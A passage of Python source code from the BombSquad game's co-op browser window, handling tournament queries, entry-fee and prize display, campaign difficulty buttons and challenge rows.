ba.WeakCall(self._update),
timetype=ba.TimeType.REAL,
repeat=True)
self._update()
@staticmethod
def _preload_modules() -> None:
"""Preload modules we use (called in bg thread)."""
import bastd.ui.purchase as _unused1
import bastd.ui.coop.gamebutton as _unused2
import bastd.ui.confirm as _unused3
import bastd.ui.account as _unused4
import bastd.ui.league.rankwindow as _unused5
import bastd.ui.store.browser as _unused6
import bastd.ui.account.viewer as _unused7
import bastd.ui.tournamentscores as _unused8
import bastd.ui.tournamententry as _unused9
import bastd.ui.play as _unused10
def _update(self) -> None:
# Do nothing if we've somehow outlived our actual UI.
if not self._root_widget:
return
cur_time = ba.time(ba.TimeType.REAL)
# If its been a while since we got a tournament update, consider the
# data invalid (prevents us from joining tournaments if our internet
# connection goes down for a while).
if (self._last_tournament_query_response_time is None
or ba.time(ba.TimeType.REAL) -
self._last_tournament_query_response_time > 60.0 * 2):
self._tourney_data_up_to_date = False
# If our account state has changed, do a full request.
account_state_num = _ba.get_account_state_num()
if account_state_num != self._account_state_num:
self._account_state_num = account_state_num
self._save_state()
self._refresh()
# Also encourage a new tournament query since this will clear out
# our current results.
if not self._doing_tournament_query:
self._last_tournament_query_time = None
# If we've been backgrounded/foregrounded, invalidate our
# tournament entries (they will be refreshed below asap).
if self._fg_state != ba.app.fg_state:
self._tourney_data_up_to_date = False
# Send off a new tournament query if its been long enough or whatnot.
if not self._doing_tournament_query and (
self._last_tournament_query_time is None
or cur_time - self._last_tournament_query_time > 30.0
or self._fg_state != ba.app.fg_state):
self._fg_state = ba.app.fg_state
self._last_tournament_query_time = cur_time
self._doing_tournament_query = True
_ba.tournament_query(
args={
'source': 'coop window refresh',
'numScores': 1
},
callback=ba.WeakCall(self._on_tournament_query_response),
)
# Decrement time on our tournament buttons.
ads_enabled = _ba.have_incentivized_ad()
for tbtn in self._tournament_buttons:
tbtn['time_remaining'] = max(0, tbtn['time_remaining'] - 1)
if tbtn['time_remaining_value_text'] is not None:
ba.textwidget(
edit=tbtn['time_remaining_value_text'],
text=ba.timestring(tbtn['time_remaining'],
centi=False,
suppress_format_warning=True) if
(tbtn['has_time_remaining']
and self._tourney_data_up_to_date) else '-')
# Also adjust the ad icon visibility.
if tbtn.get('allow_ads', False) and _ba.has_video_ads():
ba.imagewidget(edit=tbtn['entry_fee_ad_image'],
opacity=1.0 if ads_enabled else 0.25)
ba.textwidget(edit=tbtn['entry_fee_text_remaining'],
color=(0.6, 0.6, 0.6, 1 if ads_enabled else 0.2))
self._update_hard_mode_lock_image()
def _update_hard_mode_lock_image(self) -> None:
try:
ba.imagewidget(
edit=self._hard_button_lock_image,
opacity=0.0 if ba.app.accounts.have_pro_options() else 1.0)
except Exception:
ba.print_exception('Error updating campaign lock.')
def _update_for_data(self, data: Optional[list[dict[str, Any]]]) -> None:
# pylint: disable=too-many-statements
# pylint: disable=too-many-locals
# pylint: disable=too-many-branches
from ba.internal import getcampaign, get_tournament_prize_strings
# If the number of tournaments or challenges in the data differs from
# our current arrangement, refresh with the new number.
if ((data is None and self._tournament_button_count != 0)
or (data is not None and
(len(data) != self._tournament_button_count))):
self._tournament_button_count = len(
data) if data is not None else 0
ba.app.config['Tournament Rows'] = self._tournament_button_count
self._refresh()
# Update all of our tourney buttons based on whats in data.
for i, tbtn in enumerate(self._tournament_buttons):
assert data is not None
entry: dict[str, Any] = data[i]
prize_y_offs = (34 if 'prizeRange3' in entry else
20 if 'prizeRange2' in entry else 12)
x_offs = 90
# This seems to be a false alarm.
# pylint: disable=unbalanced-tuple-unpacking
pr1, pv1, pr2, pv2, pr3, pv3 = (
get_tournament_prize_strings(entry))
# pylint: enable=unbalanced-tuple-unpacking
enabled = 'requiredLeague' not in entry
ba.buttonwidget(edit=tbtn['button'],
color=(0.5, 0.7, 0.2) if enabled else
(0.5, 0.5, 0.5))
ba.imagewidget(edit=tbtn['lock_image'],
opacity=0.0 if enabled else 1.0)
ba.textwidget(edit=tbtn['prize_range_1_text'],
text='-' if pr1 == '' else pr1,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 + prize_y_offs))
# We want to draw values containing tickets a bit smaller
# (scratch that; we now draw medals a bit bigger).
ticket_char = ba.charstr(ba.SpecialChar.TICKET_BACKING)
prize_value_scale_large = 1.0
prize_value_scale_small = 1.0
ba.textwidget(edit=tbtn['prize_value_1_text'],
text='-' if pv1 == '' else pv1,
scale=prize_value_scale_large if ticket_char
not in pv1 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_range_2_text'],
text=pr2,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 45 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_value_2_text'],
text=pv2,
scale=prize_value_scale_large if ticket_char
not in pv2 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 45 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_range_3_text'],
text=pr3,
position=(tbtn['button_x'] + 365 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 90 + prize_y_offs))
ba.textwidget(edit=tbtn['prize_value_3_text'],
text=pv3,
scale=prize_value_scale_large if ticket_char
not in pv3 else prize_value_scale_small,
position=(tbtn['button_x'] + 380 + x_offs,
tbtn['button_y'] + tbtn['button_scale_y'] -
93 - 90 + prize_y_offs))
leader_name = '-'
leader_score: Union[str, ba.Lstr] = '-'
if entry['scores']:
score = tbtn['leader'] = copy.deepcopy(entry['scores'][0])
leader_name = score[1]
leader_score = (ba.timestring(
score[0] * 10,
centi=True,
timeformat=ba.TimeFormat.MILLISECONDS,
suppress_format_warning=True) if entry['scoreType']
== 'time' else str(score[0]))
else:
tbtn['leader'] = None
ba.textwidget(edit=tbtn['current_leader_name_text'],
text=ba.Lstr(value=leader_name))
self._tournament_leader_score_type = (entry['scoreType'])
ba.textwidget(edit=tbtn['current_leader_score_text'],
text=leader_score)
ba.buttonwidget(edit=tbtn['more_scores_button'],
label=ba.Lstr(resource=self._r + '.seeMoreText'))
out_of_time_text: Union[str, ba.Lstr] = (
'-' if 'totalTime' not in entry else ba.Lstr(
resource=self._r + '.ofTotalTimeText',
subs=[('${TOTAL}',
ba.timestring(entry['totalTime'],
centi=False,
suppress_format_warning=True))]))
ba.textwidget(edit=tbtn['time_remaining_out_of_text'],
text=out_of_time_text)
tbtn['time_remaining'] = entry['timeRemaining']
tbtn['has_time_remaining'] = entry is not None
tbtn['tournament_id'] = entry['tournamentID']
tbtn['required_league'] = (None if 'requiredLeague' not in entry
else entry['requiredLeague'])
game = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['game']
if game is None:
ba.textwidget(edit=tbtn['button_text'], text='-')
ba.imagewidget(edit=tbtn['image'],
texture=ba.gettexture('black'),
opacity=0.2)
else:
campaignname, levelname = game.split(':')
campaign = getcampaign(campaignname)
max_players = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['maxPlayers']
txt = ba.Lstr(
value='${A} ${B}',
subs=[('${A}', campaign.getlevel(levelname).displayname),
('${B}',
ba.Lstr(resource='playerCountAbbreviatedText',
subs=[('${COUNT}', str(max_players))]))])
ba.textwidget(edit=tbtn['button_text'], text=txt)
ba.imagewidget(
edit=tbtn['image'],
texture=campaign.getlevel(levelname).get_preview_texture(),
opacity=1.0 if enabled else 0.5)
fee = entry['fee']
if fee is None:
fee_var = None
elif fee == 4:
fee_var = 'price.tournament_entry_4'
elif fee == 3:
fee_var = 'price.tournament_entry_3'
elif fee == 2:
fee_var = 'price.tournament_entry_2'
elif fee == 1:
fee_var = 'price.tournament_entry_1'
else:
if fee != 0:
print('Unknown fee value:', fee)
fee_var = 'price.tournament_entry_0'
tbtn['allow_ads'] = allow_ads = entry['allowAds']
final_fee: Optional[int] = (None if fee_var is None else
_ba.get_account_misc_read_val(
fee_var, '?'))
final_fee_str: Union[str, ba.Lstr]
if fee_var is None:
final_fee_str = ''
else:
if final_fee == 0:
final_fee_str = ba.Lstr(
resource='getTicketsWindow.freeText')
else:
final_fee_str = (
ba.charstr(ba.SpecialChar.TICKET_BACKING) +
str(final_fee))
ad_tries_remaining = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['adTriesRemaining']
free_tries_remaining = ba.app.accounts.tournament_info[
tbtn['tournament_id']]['freeTriesRemaining']
# Now, if this fee allows ads and we support video ads, show
# the 'or ad' version.
if allow_ads and _ba.has_video_ads():
ads_enabled = _ba.have_incentivized_ad()
ba.imagewidget(edit=tbtn['entry_fee_ad_image'],
opacity=1.0 if ads_enabled else 0.25)
or_text = ba.Lstr(resource='orText',
subs=[('${A}', ''),
('${B}', '')]).evaluate().strip()
ba.textwidget(edit=tbtn['entry_fee_text_or'], text=or_text)
ba.textwidget(
edit=tbtn['entry_fee_text_top'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 60),
scale=1.3,
text=final_fee_str)
# Possibly show number of ad-plays remaining.
ba.textwidget(
edit=tbtn['entry_fee_text_remaining'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 146),
text='' if ad_tries_remaining in [None, 0] else
('' + str(ad_tries_remaining)),
color=(0.6, 0.6, 0.6, 1 if ads_enabled else 0.2))
else:
ba.imagewidget(edit=tbtn['entry_fee_ad_image'], opacity=0.0)
ba.textwidget(edit=tbtn['entry_fee_text_or'], text='')
ba.textwidget(
edit=tbtn['entry_fee_text_top'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 80),
scale=1.3,
text=final_fee_str)
# Possibly show number of free-plays remaining.
ba.textwidget(
edit=tbtn['entry_fee_text_remaining'],
position=(tbtn['button_x'] + 360,
tbtn['button_y'] + tbtn['button_scale_y'] - 100),
text=('' if (free_tries_remaining in [None, 0]
or final_fee != 0) else
('' + str(free_tries_remaining))),
color=(0.6, 0.6, 0.6, 1))
def _on_tournament_query_response(self, data: Optional[dict[str,
Any]]) -> None:
accounts = ba.app.accounts
if data is not None:
tournament_data = data['t'] # This used to be the whole payload.
self._last_tournament_query_response_time = ba.time(
ba.TimeType.REAL)
else:
tournament_data = None
# Keep our cached tourney info up to date.
if data is not None:
self._tourney_data_up_to_date = True
accounts.cache_tournament_info(tournament_data)
# Also cache the current tourney list/order for this account.
accounts.account_tournament_list = (_ba.get_account_state_num(), [
e['tournamentID'] for e in tournament_data
])
self._doing_tournament_query = False
self._update_for_data(tournament_data)
def _set_campaign_difficulty(self, difficulty: str) -> None:
# pylint: disable=cyclic-import
from bastd.ui.purchase import PurchaseWindow
if difficulty != self._campaign_difficulty:
if difficulty == 'hard' and not ba.app.accounts.have_pro_options():
PurchaseWindow(items=['pro'])
return
ba.playsound(ba.getsound('gunCocking'))
if difficulty not in ('easy', 'hard'):
print('ERROR: invalid campaign difficulty:', difficulty)
difficulty = 'easy'
self._campaign_difficulty = difficulty
_ba.add_transaction({
'type': 'SET_MISC_VAL',
'name': 'campaignDifficulty',
'value': difficulty
})
self._refresh_campaign_row()
else:
ba.playsound(ba.getsound('click01'))
def _refresh_campaign_row(self) -> None:
# pylint: disable=too-many-locals
# pylint: disable=cyclic-import
from ba.internal import getcampaign
from bastd.ui.coop.gamebutton import GameButton
parent_widget = self._campaign_sub_container
# Clear out anything in the parent widget already.
for child in parent_widget.get_children():
child.delete()
next_widget_down = self._tournament_info_button
h = 0
v2 = -2
sel_color = (0.75, 0.85, 0.5)
sel_color_hard = (0.4, 0.7, 0.2)
un_sel_color = (0.5, 0.5, 0.5)
sel_textcolor = (2, 2, 0.8)
un_sel_textcolor = (0.6, 0.6, 0.6)
self._easy_button = ba.buttonwidget(
parent=parent_widget,
position=(h + 30, v2 + 105),
size=(120, 70),
label=ba.Lstr(resource='difficultyEasyText'),
button_type='square',
autoselect=True,
enable_sound=False,
on_activate_call=ba.Call(self._set_campaign_difficulty, 'easy'),
on_select_call=ba.Call(self.sel_change, 'campaign', 'easyButton'),
color=sel_color
if self._campaign_difficulty == 'easy' else un_sel_color,
textcolor=sel_textcolor
if self._campaign_difficulty == 'easy' else un_sel_textcolor)
ba.widget(edit=self._easy_button, show_buffer_left=100)
if self._selected_campaign_level == 'easyButton':
ba.containerwidget(edit=parent_widget,
selected_child=self._easy_button,
visible_child=self._easy_button)
lock_tex = ba.gettexture('lock')
self._hard_button = ba.buttonwidget(
parent=parent_widget,
position=(h + 30, v2 + 32),
size=(120, 70),
label=ba.Lstr(resource='difficultyHardText'),
button_type='square',
autoselect=True,
enable_sound=False,
on_activate_call=ba.Call(self._set_campaign_difficulty, 'hard'),
on_select_call=ba.Call(self.sel_change, 'campaign', 'hardButton'),
color=sel_color_hard
if self._campaign_difficulty == 'hard' else un_sel_color,
textcolor=sel_textcolor
if self._campaign_difficulty == 'hard' else un_sel_textcolor)
self._hard_button_lock_image = ba.imagewidget(
parent=parent_widget,
size=(30, 30),
draw_controller=self._hard_button,
position=(h + 30 - 10, v2 + 32 + 70 - 35),
texture=lock_tex)
self._update_hard_mode_lock_image()
ba.widget(edit=self._hard_button, show_buffer_left=100)
if self._selected_campaign_level == 'hardButton':
ba.containerwidget(edit=parent_widget,
selected_child=self._hard_button,
visible_child=self._hard_button)
ba.widget(edit=self._hard_button, down_widget=next_widget_down)
h_spacing = 200
campaign_buttons = []
if self._campaign_difficulty == 'easy':
campaignname = 'Easy'
else:
campaignname = 'Default'
items = [
campaignname + ':Onslaught Training',
campaignname + ':Rookie Onslaught',
campaignname + ':Rookie Football', campaignname + ':Pro Onslaught',
campaignname + ':Pro Football', campaignname + ':Pro Runaround',
campaignname + ':Uber Onslaught', campaignname + ':Uber Football',
campaignname + ':Uber Runaround'
]
items += [campaignname + ':The Last Stand']
if self._selected_campaign_level is None:
self._selected_campaign_level = items[0]
h = 150
for i in items:
is_last_sel = (i == self._selected_campaign_level)
campaign_buttons.append(
GameButton(self, parent_widget, i, h, v2, is_last_sel,
'campaign').get_button())
h += h_spacing
ba.widget(edit=campaign_buttons[0], left_widget=self._easy_button)
if self._back_button is not None:
ba.widget(edit=self._easy_button, up_widget=self._back_button)
for btn in campaign_buttons:
ba.widget(edit=btn,
up_widget=self._back_button,
down_widget=next_widget_down)
# Update our existing percent-complete text.
campaign = getcampaign(campaignname)
levels = campaign.levels
levels_complete = sum((1 if l.complete else 0) for l in levels)
# Last level cant be completed; hence the -1.
progress = min(1.0, float(levels_complete) / (len(levels) - 1))
p_str = str(int(progress * 100.0)) + '%'
self._campaign_percent_text = ba.textwidget(
edit=self._campaign_percent_text,
text=ba.Lstr(value='${C} (${P})',
subs=[('${C}',
ba.Lstr(resource=self._r + '.campaignText')),
('${P}', p_str)]))
def _on_tournament_info_press(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.confirm import ConfirmWindow
txt = ba.Lstr(resource=self._r + '.tournamentInfoText')
ConfirmWindow(txt,
cancel_button=False,
width=550,
height=260,
origin_widget=self._tournament_info_button)
def _refresh(self) -> None:
# pylint: disable=too-many-statements
# pylint: disable=too-many-branches
# pylint: disable=too-many-locals
# pylint: disable=cyclic-import
from bastd.ui.coop.gamebutton import GameButton
# (Re)create the sub-container if need be.
if self._subcontainer is not None:
self._subcontainer.delete()
tourney_row_height = 200
self._subcontainerheight = (
620 + self._tournament_button_count * tourney_row_height)
self._subcontainer = ba.containerwidget(
parent=self._scrollwidget,
size=(self._subcontainerwidth, self._subcontainerheight),
background=False,
claims_left_right=True,
claims_tab=True,
selection_loops_to_parent=True)
ba.containerwidget(edit=self._root_widget,
selected_child=self._scrollwidget)
if self._back_button is not None:
ba.containerwidget(edit=self._root_widget,
cancel_button=self._back_button)
w_parent = self._subcontainer
h_base = 6
v = self._subcontainerheight - 73
self._campaign_percent_text = ba.textwidget(
parent=w_parent,
position=(h_base + 27, v + 30),
size=(0, 0),
text='',
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
row_v_show_buffer = 100
v -= 198
h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
simple_culling_h=70,
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=lambda: self._on_row_selected('campaign'))
self._campaign_h_scroll = h_scroll
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=row_v_show_buffer,
autoselect=True)
if self._selected_row == 'campaign':
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
self._campaign_sub_container = ba.containerwidget(parent=h_scroll,
size=(180 + 200 * 10,
200),
background=False)
# Tournaments
self._tournament_buttons: list[dict[str, Any]] = []
v -= 53
# FIXME shouldn't use hard-coded strings here.
txt = ba.Lstr(resource='tournamentsText',
fallback_resource='tournamentText').evaluate()
t_width = _ba.get_string_width(txt, suppress_warning=True)
ba.textwidget(parent=w_parent,
position=(h_base + 27, v + 30),
size=(0, 0),
text=txt,
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
self._tournament_info_button = ba.buttonwidget(
parent=w_parent,
label='?',
size=(20, 20),
text_scale=0.6,
position=(h_base + 27 + t_width * 1.1 + 15, v + 18),
button_type='square',
color=(0.6, 0.5, 0.65),
textcolor=(0.7, 0.6, 0.75),
autoselect=True,
up_widget=self._campaign_h_scroll,
on_activate_call=self._on_tournament_info_press)
ba.widget(edit=self._tournament_info_button,
left_widget=self._tournament_info_button,
right_widget=self._tournament_info_button)
# Say 'unavailable' if there are zero tournaments, and if we're not
# signed in add that as well (that's probably why we see
# no tournaments).
if self._tournament_button_count == 0:
unavailable_text = ba.Lstr(resource='unavailableText')
if _ba.get_account_state() != 'signed_in':
unavailable_text = ba.Lstr(
value='${A} (${B})',
subs=[('${A}', unavailable_text),
('${B}', ba.Lstr(resource='notSignedInText'))])
ba.textwidget(parent=w_parent,
position=(h_base + 47, v),
size=(0, 0),
text=unavailable_text,
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=0.9)
v -= 40
v -= 198
tournament_h_scroll = None
if self._tournament_button_count > 0:
for i in range(self._tournament_button_count):
tournament_h_scroll = h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=ba.Call(self._on_row_selected,
'tournament' + str(i + 1)))
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=row_v_show_buffer,
autoselect=True)
if self._selected_row == 'tournament' + str(i + 1):
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
sc2 = ba.containerwidget(parent=h_scroll,
size=(self._scroll_width - 24, 200),
background=False)
h = 0
v2 = -2
is_last_sel = True
self._tournament_buttons.append(
self._tournament_button(sc2, h, v2, is_last_sel))
v -= 200
# Custom Games.
v -= 50
ba.textwidget(parent=w_parent,
position=(h_base + 27, v + 30 + 198),
size=(0, 0),
text=ba.Lstr(
resource='practiceText',
fallback_resource='coopSelectWindow.customText'),
h_align='left',
v_align='center',
color=ba.app.ui.title_color,
scale=1.1)
items = [
'Challenges:Infinite Onslaught',
'Challenges:Infinite Runaround',
'Challenges:Ninja Fight',
'Challenges:Pro Ninja Fight',
'Challenges:Meteor Shower',
'Challenges:Target Practice B',
'Challenges:Target Practice',
]
# Show easter-egg-hunt either if its easter or we own it.
if _ba.get_account_misc_read_val(
'easter', False) or _ba.get_purchased('games.easter_egg_hunt'):
items = [
'Challenges:Easter Egg Hunt', 'Challenges:Pro Easter Egg Hunt'
] + items
# add all custom user levels here..
# items += [
# 'User:' + l.getname()
# for l in getcampaign('User').getlevels()
# ]
self._custom_h_scroll = custom_h_scroll = h_scroll = ba.hscrollwidget(
parent=w_parent,
size=(self._scroll_width - 10, 205),
position=(-5, v),
highlight=False,
border_opacity=0.0,
color=(0.45, 0.4, 0.5),
on_select_call=ba.Call(self._on_row_selected, 'custom'))
ba.widget(edit=h_scroll,
show_buffer_top=row_v_show_buffer,
show_buffer_bottom=1.5 * row_v_show_buffer,
autoselect=True)
if self._selected_row == 'custom':
ba.containerwidget(edit=w_parent,
selected_child=h_scroll,
visible_child=h_scroll)
ba.containerwidget(edit=h_scroll, claims_left_right=True)
sc2 = ba.containerwidget(parent=h_scroll,
size=(max(self._scroll_width - 24,
30 + 200 * len(items)), 200),
background=False)
h_spacing = 200
self._custom_buttons: list[GameButton] = []
h = 0
v2 = -2
for item in items:
is_last_sel = (item == self._selected_custom_level)
self._custom_buttons.append(
GameButton(self, sc2, item, h, v2, is_last_sel, 'custom'))
h += h_spacing
# We can't fill in our campaign row until tourney buttons are in place.
# (for wiring up)
self._refresh_campaign_row()
for i, tbutton in enumerate(self._tournament_buttons):
ba.widget(
edit=tbutton['button'],
up_widget=self._tournament_info_button
if i == 0 else self._tournament_buttons[i - 1]['button'],
down_widget=self._tournament_buttons[(i + 1)]['button']
if i + 1 < len(self._tournament_buttons) else custom_h_scroll)
ba.widget(
edit=tbutton['more_scores_button'],
down_widget=self._tournament_buttons[(
i + 1)]['current_leader_name_text']
if i + 1 < len(self._tournament_buttons) else custom_h_scroll)
ba.widget(edit=tbutton['current_leader_name_text'],
up_widget=self._tournament_info_button if i == 0 else
self._tournament_buttons[i - 1]['more_scores_button'])
for btn in self._custom_buttons:
try:
ba.widget(
edit=btn.get_button(),
up_widget=tournament_h_scroll if self._tournament_buttons
else self._tournament_info_button)
except Exception:
ba.print_exception('Error wiring up custom buttons.')
if self._back_button is not None:
ba.buttonwidget(edit=self._back_button,
on_activate_call=self._back)
else:
ba.containerwidget(edit=self._root_widget,
on_cancel_call=self._back)
# There's probably several 'onSelected' callbacks pushed onto the
# event queue.. we need to push ours too so we're enabled *after* them.
ba.pushcall(self._enable_selectable_callback)
def _on_row_selected(self, row: str) -> None:
if self._do_selection_callbacks:
if self._selected_row != row:
self._selected_row = row
def _enable_selectable_callback(self) -> None:
self._do_selection_callbacks = True
def _tournament_button(self, parent: ba.Widget, x: float, y: float,
select: bool) -> dict[str, Any]:
sclx = 300
scly = 195.0
data: dict[str, Any] = {
'tournament_id': None,
'time_remaining': 0,
'has_time_remaining': False,
'leader': None
}
data['button'] = btn = ba.buttonwidget(
parent=parent,
position=(x + 23, y + 4),
size=(sclx, scly),
label='',
button_type='square',
autoselect=True,
on_activate_call=lambda: self.run(None, tournament_button=data))
ba.widget(edit=btn,
show_buffer_bottom=50,
show_buffer_top=50,
show_buffer_left=400,
show_buffer_right=200)
if select:
ba.containerwidget(edit=parent,
selected_child=btn,
visible_child=btn)
image_width = sclx * 0.85 * 0.75
data['image'] = ba.imagewidget(
parent=parent,
draw_controller=btn,
position=(x + 21 + sclx * 0.5 - image_width * 0.5, y + scly - 150),
size=(image_width, image_width * 0.5),
model_transparent=self.lsbt,
model_opaque=self.lsbo,
texture=ba.gettexture('black'),
opacity=0.2,
mask_texture=ba.gettexture('mapPreviewMask'))
data['lock_image'] = ba.imagewidget(
parent=parent,
draw_controller=btn,
position=(x + 21 + sclx * 0.5 - image_width * 0.25,
y + scly - 150),
size=(image_width * 0.5, image_width * 0.5),
texture=ba.gettexture('lock'),
opacity=0.0)
data['button_text'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 20 + sclx * 0.5,
y + scly - 35),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=sclx * 0.76,
scale=0.85,
color=(0.8, 1.0, 0.8, 1.0))
header_color = (0.43, 0.4, 0.5, 1)
value_color = (0.6, 0.6, 0.6, 1)
x_offs = 0
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.entryFeeText'),
v_align='center',
maxwidth=100,
scale=0.9,
color=header_color,
flatness=1.0)
data['entry_fee_text_top'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360,
y + scly - 60),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=60,
scale=1.3,
color=value_color,
flatness=1.0)
data['entry_fee_text_or'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360,
y + scly - 90),
size=(0, 0),
h_align='center',
text='',
v_align='center',
maxwidth=60,
scale=0.5,
color=value_color,
flatness=1.0)
data['entry_fee_text_remaining'] = ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 360, y +
scly - 90),
size=(0, 0),
h_align='center',
text='',
v_align='center',
maxwidth=60,
scale=0.5,
color=value_color,
flatness=1.0)
data['entry_fee_ad_image'] = ba.imagewidget(
parent=parent,
size=(40, 40),
draw_controller=btn,
position=(x + 360 - 20, y + scly - 140),
opacity=0.0,
texture=ba.gettexture('tv'))
x_offs += 50
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 447 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.prizesText'),
v_align='center',
maxwidth=130,
scale=0.9,
color=header_color,
flatness=1.0)
data['button_x'] = x
data['button_y'] = y
data['button_scale_y'] = scly
xo2 = 0
prize_value_scale = 1.5
data['prize_range_1_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
text='-',
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_1_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='-',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
data['prize_range_2_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_2_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
data['prize_range_3_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 355 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='right',
v_align='center',
maxwidth=50,
scale=0.8,
color=header_color,
flatness=1.0)
data['prize_value_3_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 380 + xo2 + x_offs, y + scly - 93),
size=(0, 0),
h_align='left',
text='',
v_align='center',
maxwidth=100,
scale=prize_value_scale,
color=value_color,
flatness=1.0)
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.currentBestText'),
v_align='center',
maxwidth=180,
scale=0.9,
color=header_color,
flatness=1.0)
data['current_leader_name_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs - (170 / 1.4) * 0.5,
y + scly - 60 - 40 * 0.5),
selectable=True,
click_activate=True,
autoselect=True,
on_activate_call=lambda: self._show_leader(tournament_button=data),
size=(170 / 1.4, 40),
h_align='center',
text='-',
v_align='center',
maxwidth=170,
scale=1.4,
color=value_color,
flatness=1.0)
data['current_leader_score_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 620 + x_offs, y + scly - 113 + 10),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=170,
scale=1.8,
color=value_color,
flatness=1.0)
data['more_scores_button'] = ba.buttonwidget(
parent=parent,
position=(x + 620 + x_offs - 60, y + scly - 50 - 125),
color=(0.5, 0.5, 0.6),
textcolor=(0.7, 0.7, 0.8),
label='-',
size=(120, 40),
autoselect=True,
up_widget=data['current_leader_name_text'],
text_scale=0.6,
on_activate_call=lambda: self._show_scores(tournament_button=data))
ba.widget(edit=data['current_leader_name_text'],
down_widget=data['more_scores_button'])
ba.textwidget(parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 20),
size=(0, 0),
h_align='center',
text=ba.Lstr(resource=self._r + '.timeRemainingText'),
v_align='center',
maxwidth=180,
scale=0.9,
color=header_color,
flatness=1.0)
data['time_remaining_value_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 68),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=180,
scale=2.0,
color=value_color,
flatness=1.0)
data['time_remaining_out_of_text'] = ba.textwidget(
parent=parent,
draw_controller=btn,
position=(x + 820 + x_offs, y + scly - 110),
size=(0, 0),
h_align='center',
text='-',
v_align='center',
maxwidth=120,
scale=0.72,
color=(0.4, 0.4, 0.5),
flatness=1.0)
return data
def _switch_to_league_rankings(self) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account import show_sign_in_prompt
from bastd.ui.league.rankwindow import LeagueRankWindow
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
self._save_state()
ba.containerwidget(edit=self._root_widget, transition='out_left')
assert self._league_rank_button is not None
ba.app.ui.set_main_menu_window(
LeagueRankWindow(origin_widget=self._league_rank_button.get_button(
)).get_root_widget())
def _switch_to_score(
self,
show_tab: Optional[
StoreBrowserWindow.TabID] = StoreBrowserWindow.TabID.EXTRAS
) -> None:
# pylint: disable=cyclic-import
from bastd.ui.account import show_sign_in_prompt
if _ba.get_account_state() != 'signed_in':
show_sign_in_prompt()
return
